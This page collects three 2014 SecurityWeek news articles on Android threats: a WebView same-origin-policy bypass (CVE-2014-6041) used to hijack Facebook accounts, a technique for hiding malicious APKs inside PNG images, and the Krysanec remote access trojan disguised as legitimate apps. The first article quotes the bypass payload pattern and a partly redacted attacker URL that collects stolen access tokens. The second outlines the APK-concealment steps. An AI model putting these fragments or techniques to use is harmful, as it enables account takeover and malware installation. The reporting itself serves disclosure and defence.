December 26, 2024

Facebook Users Targeted Via Android Same Origin Policy Vulnerability

Posted on December 29, 2014 by in Security

 Researchers at Trend Micro say attackers are actively exploiting a vulnerability in Android’s WebView browser in order to compromise Facebook accounts. 

The flaw allows the attackers to bypass Android’s Same Origin Policy (SOP), and impacts devices running versions of the operating system prior to 4.4. The vulnerability, CVE-2014-6041, was first disclosed in September by an independent researcher. But months later, the vulnerability continues to be exploited in the wild.

“The Android WebView in Android before 4.4 allows remote attackers to bypass the Same Origin Policy via a crafted attribute containing a u0000 character, as demonstrated by an onclick=”window.open(‘u0000javascript: sequence to the Android Browser application 4.2.1 or a third-party web browser,” according to the National Vulnerability Database.

According to Trend Micro Mobile Security Engineer Simon Huang, the attack targets Facebook users via a link in a particular Facebook page that leads to a malicious site. The page contains obfuscated JavaScript code that includes an attempt to load a Facebook URL in an inner frame. The user will only see a blank page as the page’s HTML has been set not to display anything via its div tag while the inner frame has a size of one pixel, he added.

“While these routines are being carried out, the SOP bypass is being performed,” he blogged, adding that a remote JavaScript file is loaded from a legitimate cloud storage provider.

The file, he noted, contains the malicious code of the attack and enables the attackers to perform the following activities on Facebook:

  1. Add friends
  2. Like and follow Facebook pages
  3. Modify subscriptions
  4. Authorize a Facebook app to access the user’s public profile, friends list, birthday information, likes and friends’ likes
  5. Steal the victim’s access tokens and upload them to their server  at http://{BLOCKED}martforchristmas.website/walmart/j/index.php?cid=544fba6ac6988&access_token= $ token;
  6. Collect analytics data (such as victims’ location, HTTP referrer,  etc.) using the legitimate service at https://whos.{BLOCKED}ung.us/pingjs/

“In addition to the code at the above site, we found a similar attack at <a href="http://redirect.viglink.com?key=11fe087258b6fc0532a5ccfc924805c0&u=http%3A%2F%2Fwww.%257bBLOCKED%257dphp.com%2Fx%2Ftoplu.php%22%3Ehttp%3A%2F%2Fwww.%7BBLOCKED%7Dphp.com%2Fx%2Ftoplu.php%3C%2Fa%3E%2C" Huang explained. "We believe both of them are created by the same author because they share several function names, as well as the client_id of the Facebook app."

“The client_id involved in this malware was “2254487659”,” he added. “This is an official BlackBerry App  maintained by BlackBerry. We confirmed with BlackBerry and clarified that this malware is trying to take advantage of the trusted BlackBerry brand name and steal user’s access-tokens, which can be used to make requests to Facebook APIs and read user’s information or to publish content to Facebook on behalf of a person.”

Blackberry is working with Facebook and Trend Micro to address the issue. Google has already issued a fix for the vulnerability for Android users.

Subscribe to the SecurityWeek Email Briefing

view counter

Brian Prince is a Contributing Writer for SecurityWeek.

Previous Columns by Brian Prince:


SecurityWeek RSS Feed

Researchers Hide Android Applications in Image Files

Posted on October 17, 2014 by in Security

AMSTERDAM – BLACK HAT EUROPE – Researchers have found a way to trick Android users into executing potentially malicious applications by hiding them inside innocent-looking image files.

Axelle Apvrille, mobile/IoT malware analyst and researcher at Fortinet, and Ange Albertini, reverse engineer and author of Corkami.com, have created an application that can be used to encrypt an APK to make it look like a PNG image file.

 In a real attack leveraging this method, the attacker sends an application containing an image to the potential victim. When the app is launched, the victim only sees the harmless-looking image. In the background however, a malicious payload is installed onto the victim’s Android device.

 In order to hide the installation of the malicious payload, the attacker can leverage the DexClassLoader constructor, the experts said.

According to the researchers, the method works on Android 4.4.2 and prior versions of the operating system. Google developed a fix for the flaw back in June, but Apvrille told SecurityWeek in an interview that the fix is incomplete. The researchers have informed Google of this and the company is now working on a more efficient fix.

How does it work?

The attacker writes his malicious payload and encrypts it to make it look like a valid PNG image file. The encryption is done with AngeCryption, an application developed by the researchers.

Controlling AES encryption can be a difficult task, but AngeCryption is designed to encrypt the APK so that Android doesn’t see any difference. Furthermore, the resulting image looks normal to users, except for the fact that it’s 500Kb in size, which is a bit much for a small resolution image.

The final step is to create a wrapping APK in which the malicious PNG is inserted, and then decrypted and installed.

When Android APKs are written, they must end with an End of Central Directory (EOCD) marker. The researchers managed to add their specially crafted PNG file to the APK by appending it after the first EOCD and adding a second EOCD at the end.

Previous Columns by Eduard Kovacs:


SecurityWeek RSS Feed

Android Trojan Krysanec Comes Disguised as Legitimate Apps

Posted on August 13, 2014 by in Security

Researchers at ESET have uncovered a new remote access Trojan (RAT) for Android that has been masked by cybercriminals as various popular applications.

The malware, detected by the security firm as Android/Spy.Krysanec, is capable of infiltrating both free and paid Android apps, and it has been distributed via a file sharing website, a Russian social network and other channels. It has been disguised as 3G Traffic Guard, a mobile banking app from Russia’s top lender Sberbank, and even ESET Mobile Security. However, unlike the legitimate programs, the trojanized versions are not signed with valid digital certificates.

According to ESET’s Robert Lipovsky, the malicious applications they have discovered actually contain the old multi-platform RAT known as Unrecom (previously known as Adwind). Trend Micro revealed back in April that the threat was upgraded to run on Android devices. At the time, the security firm also discovered that Unrecom worked as an APK binder, giving it the ability to trojanize legitimate applications.

Once it finds itself on a device, the threat can be used to download and execute additional components that enable cybercriminals to perform various activities, like recording audio through the microphone, taking pictures, accessing text messages, obtaining the current GPS location, and collecting information on installed apps, placed calls and visited webpages.

Researchers have found that some of the samples communicate with a command and control (C&C) server hosted on a domain belonging to No-IP, the dynamic DNS provider whose domains were seized recently by Microsoft as part of an operation against the Bladabindi (njRAT) and Jenxcus (NJw0rm) botnets. The domains were later returned to the DNS company and the case was dropped after Microsoft determined that No-IP was not knowingly facilitating the distribution of malware. 

 “It’s a relatively straightforward job for someone with coding experience to decompile an existing Android app, insert malicious capabilities, and re-build it as new,” Nathan Collier, senior malware intelligence analyst at Malwarebytes Labs, said in an emailed statement. “The tools to make this possible can be found by anyone with a good working knowledge of a search engine. A lot of the Android RATs used also utilize existing pre-built toolkits, making it relatively straightforward.”

 

Previous Columns by Eduard Kovacs:


SecurityWeek RSS Feed